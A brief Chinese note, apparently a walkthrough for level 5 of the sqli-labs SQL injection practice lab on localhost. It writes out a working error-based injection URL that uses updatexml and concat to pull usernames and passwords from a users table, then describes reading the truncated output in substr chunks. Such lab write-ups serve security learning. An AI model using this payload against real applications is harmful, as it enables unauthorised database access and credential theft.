第五关 然后修改userLess-5 Double Query- Single Quotes- Stringhttp://localhost/sql/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username,0x3a,password)from%20users),0x7e),1)--+substr截取 在前面截取 注意不要少写括号,不然会报错 1-32之后截取32-64 可以看到还没有截取完,再截取64-96 最后截取192-200发现是已经截取完了